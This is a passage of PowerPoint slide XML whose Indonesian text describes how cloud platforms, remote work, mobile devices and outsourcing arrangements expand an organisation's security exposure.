              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, platform cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengadopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tenaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tenaga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Perusahaan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jejak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dramatis. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Smartphone dan tablet modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seiring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda-beda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Outsourcing dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
